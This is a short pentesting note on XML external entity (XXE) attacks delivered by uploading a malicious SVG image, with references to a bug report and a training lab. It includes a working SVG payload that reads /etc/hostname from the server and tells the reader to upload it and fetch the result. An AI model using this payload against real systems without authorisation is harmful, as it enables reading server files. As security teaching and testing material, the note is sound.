XXE Via File Upload

The file upload functionality, opens the gateway for the XML External Entities, especially when the application accepts the file formats that support XML. Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities.

Try Uploading this code with .svg extension and retrieve the svg file from application to check:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/199/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

Reference:

https://hackerone.com/reports/897244

https://www.exploit-db.com/docs/49732

https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload